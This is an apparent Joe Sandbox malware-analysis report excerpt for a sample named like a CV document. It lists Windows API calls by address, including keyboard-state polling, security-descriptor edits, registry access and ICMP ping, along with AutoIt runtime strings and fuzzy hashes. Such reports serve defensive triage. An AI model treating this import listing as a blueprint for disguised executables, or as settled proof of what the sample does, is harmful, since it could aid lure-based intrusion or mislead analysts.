                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003EEF3B
                                                                                        • GetFocus.USER32 ref: 003EEF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 003EEF56
                                                                                        • _memset.LIBCMT ref: 003EF081
                                                                                        • GetMenuItemInfoW.USER32 ref: 003EF0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003EF0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003EF0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003EF113
                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003EF15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003EF193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003EF1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        APIs
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                          • Part of subcall function 003BABBB: GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                          • Part of subcall function 003BABBB: GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                          • Part of subcall function 003BABBB: HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                          • Part of subcall function 003BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                          • Part of subcall function 003BAC56: GetProcessHeap.KERNEL32(00000008,003BA6B5,00000000,00000000,?,003BA6B5,?), ref: 003BAC62
                                                                                          • Part of subcall function 003BAC56: HeapAlloc.KERNEL32(00000000,?,003BA6B5,?), ref: 003BAC69
                                                                                          • Part of subcall function 003BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003BA6B5,?), ref: 003BAC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003BA8CB
                                                                                        • _memset.LIBCMT ref: 003BA8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003BA8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 003BA94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003BA969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 003BA986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003BA995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BA99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003BA9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 003BA9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003BA9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003BAA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003BAA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: $EC$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C55D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003C5664
                                                                                        • GetMenuItemCount.USER32(00441708), ref: 003C56ED
                                                                                        • DeleteMenu.USER32(00441708,00000005,00000000,000000F5,?,?), ref: 003C577D
                                                                                        • DeleteMenu.USER32(00441708,00000004,00000000), ref: 003C5785
                                                                                        • DeleteMenu.USER32(00441708,00000006,00000000), ref: 003C578D
                                                                                        • DeleteMenu.USER32(00441708,00000003,00000000), ref: 003C5795
                                                                                        • GetMenuItemCount.USER32(00441708), ref: 003C579D
                                                                                        • SetMenuItemInfoW.USER32(00441708,00000004,00000000,00000030), ref: 003C57D3
                                                                                        • GetCursorPos.USER32(?), ref: 003C57DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 003C57E6
                                                                                        • TrackPopupMenuEx.USER32(00441708,00000000,?,00000000,00000000,00000000), ref: 003C57F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003C5805
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003BA1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003BA211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003BA22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003BA249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003BA273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 003BA29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003BA2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003BA2AB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 003C67FD
                                                                                        • __swprintf.LIBCMT ref: 003C680A
                                                                                          • Part of subcall function 003A172B: __woutput_l.LIBCMT ref: 003A1784
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 003C6834
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 003C6840
                                                                                        • LockResource.KERNEL32(00000000), ref: 003C684D
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 003C686D
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 003C687F
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 003C688E
                                                                                        • LockResource.KERNEL32(?), ref: 003C689A
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003C68F9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID: 5C
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003F36F4,00000010,?,Bad directive syntax error,0041DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003C25D6
                                                                                        • LoadStringW.USER32(00000000,?,003F36F4,00000010), ref: 003C25DD
                                                                                        • _wprintf.LIBCMT ref: 003C2610
                                                                                        • __swprintf.LIBCMT ref: 003C2632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003C26A1
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003C7B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003C7B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003C7B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003C7B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003C7B8C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 003C7794
                                                                                          • Part of subcall function 0039DC38: timeGetTime.WINMM(?,75C0B400,003F58AB), ref: 0039DC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 003C77C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003C77E4
                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003C7806
                                                                                        • SetActiveWindow.USER32 ref: 003C7825
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003C7833
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 003C7852
                                                                                        • Sleep.KERNEL32(000000FA), ref: 003C785D
                                                                                        • IsWindow.USER32 ref: 003C7869
                                                                                        • EndDialog.USER32(00000000), ref: 003C787A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: 18c6623009c2283ec5ff6e391cc3d6272020cc34cb854b9fa8bbc15b54c17ad9
                                                                                        • Instruction ID: d9d2a134cda95cc50e73d41cc33d9d55762f28a181f2593ead2f5aa344459116
                                                                                        • Opcode Fuzzy Hash: 18c6623009c2283ec5ff6e391cc3d6272020cc34cb854b9fa8bbc15b54c17ad9
                                                                                        • Instruction Fuzzy Hash: 2E213B75604209AFE7065FA0ED8AF263F79FB45B4AB000438FD06E6162CB719D18DF28
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CoInitialize.OLE32(00000000), ref: 003D034B
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003D03DE
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 003D03F2
                                                                                        • CoCreateInstance.OLE32(0040DA8C,00000000,00000001,00433CF8,?), ref: 003D043E
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003D04AD
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 003D0505
                                                                                        • _memset.LIBCMT ref: 003D0542
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 003D057E
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003D05A1
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 003D05A8
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003D05DF
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 003D05E1
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: 4b4be3292fea21d3a3ab4c15d96ff04a8104175917f3ace6690490bd2ccbf934
                                                                                        • Instruction ID: 97c07ba5714c62284b16fd0f48a9c689f9c192ae4ec57ba9f741663c70997a7c
                                                                                        • Opcode Fuzzy Hash: 4b4be3292fea21d3a3ab4c15d96ff04a8104175917f3ace6690490bd2ccbf934
                                                                                        • Instruction Fuzzy Hash: 8DB1D975A00208AFDB05EFA4D888EAEBBB9EF49704F1484A9E815EB251D770ED45CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 003C2ED6
                                                                                        • SetKeyboardState.USER32(?), ref: 003C2F41
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 003C2F61
                                                                                        • GetKeyState.USER32(000000A0), ref: 003C2F78
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 003C2FA7
                                                                                        • GetKeyState.USER32(000000A1), ref: 003C2FB8
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 003C2FE4
                                                                                        • GetKeyState.USER32(00000011), ref: 003C2FF2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 003C301B
                                                                                        • GetKeyState.USER32(00000012), ref: 003C3029
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 003C3052
                                                                                        • GetKeyState.USER32(0000005B), ref: 003C3060
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 6a7477d6041e78fbf411e5ccaef94daa65012952f3e19748d75908fa34f24160
                                                                                        • Instruction ID: 2a31b7026166159fc8a8d6a93166bb2a269d4f76e94c04b3f30ae9b3cc3d18ad
                                                                                        • Opcode Fuzzy Hash: 6a7477d6041e78fbf411e5ccaef94daa65012952f3e19748d75908fa34f24160
                                                                                        • Instruction Fuzzy Hash: 2F51E62590479829FB37EBB48810FEABFF49F11340F09859DD5C29A1C2DA549F8CC7A6
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 003BED1E
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BED30
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003BED8E
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 003BED99
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BEDAB
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003BEE01
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEE0F
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003BEE20
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003BEE63
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 003BEE71
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003BEE8E
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003BEE9B
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: bf205e8f37c3c66277e7845ee331012de81783befa173610d6fdefb9818c60ee
                                                                                        • Instruction ID: 14c1dd1e9eb53e3d7b22ed232f53e9c3764d05da68a8b95c39a4fa82bce134d0
                                                                                        • Opcode Fuzzy Hash: bf205e8f37c3c66277e7845ee331012de81783befa173610d6fdefb9818c60ee
                                                                                        • Instruction Fuzzy Hash: B8512F71B00205AFDB18CFACCD85AAEBBBAEB88304F15852DF619E7290D771DD048B14
                                                                                        APIs
                                                                                          • Part of subcall function 0039B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0039B759,?,00000000,?,?,?,?,0039B72B,00000000,?), ref: 0039BA58
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0039B72B), ref: 0039B7F6
                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 0039B88D
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 003FD8A6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD8D7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD8EE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0039B72B,00000000,?,?,0039B2EF,?,?), ref: 003FD90A
                                                                                        • DeleteObject.GDI32(00000000), ref: 003FD91C
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 8e00181432d562068813d3eb2808cb2a4646885a708e3de2d075903e31d275ad
                                                                                        • Instruction ID: 0a4363cb240fab6d63ff67376cbd68dd997dd3af2561e1dd582d05fa2ae0298a
                                                                                        • Opcode Fuzzy Hash: 8e00181432d562068813d3eb2808cb2a4646885a708e3de2d075903e31d275ad
                                                                                        • Instruction Fuzzy Hash: 6561AD30501604DFDF279F94EA88B36B7FAFF85311F16462DE5869AA70C770A880CB48
                                                                                        APIs
                                                                                          • Part of subcall function 0039B526: GetWindowLongW.USER32(?,000000EB), ref: 0039B537
                                                                                        • GetSysColor.USER32(0000000F), ref: 0039B438
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: 2eb821d0fb6984563071f09c506f43a9ba2a7880441ae33614118078c0075c50
                                                                                        • Instruction ID: 14f7685c5a4231dffc3a2321e9207799bf131a1cdac585321c1155a8faeec35c
                                                                                        • Opcode Fuzzy Hash: 2eb821d0fb6984563071f09c506f43a9ba2a7880441ae33614118078c0075c50
                                                                                        • Instruction Fuzzy Hash: 2D41D530400104AFDF226F69EE89BB97B66EB46730F164271FE659E1E6C7308C41EB21
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: bf641c17a67360a916e77e3d88d1da67ff2ddd3f77a5bb3d67bf824494e94d25
                                                                                        • Instruction ID: fb44e9528d8f3827d4131ec546ac3a8fb506df97fa29f0368ffa62630f247b15
                                                                                        • Opcode Fuzzy Hash: bf641c17a67360a916e77e3d88d1da67ff2ddd3f77a5bb3d67bf824494e94d25
                                                                                        • Instruction Fuzzy Hash: 5E414FB684521CAECF66EB90CC42DDB73BCEB45310F0041A6B649E6041EA30ABE58F54
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(0041DC00,0041DC00,0041DC00), ref: 003CD7CE
                                                                                        • GetDriveTypeW.KERNEL32(?,00433A70,00000061), ref: 003CD898
                                                                                        • _wcscpy.LIBCMT ref: 003CD8C2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: 46de13e14cd437cf1949c0c316538989b1aaa930e11612c90fd4cfb120c4196e
                                                                                        • Instruction ID: 786404997359ee286fff51faa49eb153373082091a789be16f3fdede5a446054
                                                                                        • Opcode Fuzzy Hash: 46de13e14cd437cf1949c0c316538989b1aaa930e11612c90fd4cfb120c4196e
                                                                                        • Instruction Fuzzy Hash: 2A514F35504300AFC712FF14D891FAAB7A5EF84314F14896EF59A9B2A2EB71ED05CB42
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 003893AB
                                                                                        • __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 003A1557: _xtow@16.LIBCMT ref: 003A1578
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003EA259
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 003EA260
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003EA273
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003EA27B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 003EA286
                                                                                        • DeleteDC.GDI32(00000000), ref: 003EA28F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003EA299
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003EA2AD
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003EA2B9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003A5047
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __gmtime64_s.LIBCMT ref: 003A50E0
                                                                                        • __gmtime64_s.LIBCMT ref: 003A5116
                                                                                        • __gmtime64_s.LIBCMT ref: 003A5133
                                                                                        • __allrem.LIBCMT ref: 003A5189
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A51A5
                                                                                        • __allrem.LIBCMT ref: 003A51BC
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A51DA
                                                                                        • __allrem.LIBCMT ref: 003A51F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A520F
                                                                                        • __invoke_watson.LIBCMT ref: 003A5280
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C4DF8
                                                                                        • GetMenuItemInfoW.USER32(00441708,000000FF,00000000,00000030), ref: 003C4E59
                                                                                        • SetMenuItemInfoW.USER32(00441708,00000004,00000000,00000030), ref: 003C4E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 003C4EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 003C4EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003C4F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 003C4F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 003C4F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C4FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4FEB
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E9C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E9C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003E9CBF
                                                                                        • _memset.LIBCMT ref: 003E9CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E9CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E9D5A
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003B94FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 003B9549
                                                                                        • VariantInit.OLEAUT32(?), ref: 003B955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 003B957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003B95BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 003B95D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 003B95E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 003B95F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B95FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 003B960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B961A
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?C$|?C
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CoInitialize.OLE32 ref: 003DADF6
                                                                                        • CoUninitialize.OLE32 ref: 003DAE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0040D8FC,?), ref: 003DAE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 003DAED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DAF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DAFCF
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 003D8168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 003D81AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 003D81B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 003D81C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D8237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D82C2
                                                                                        • WSACleanup.WSOCK32 ref: 003D82C8
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
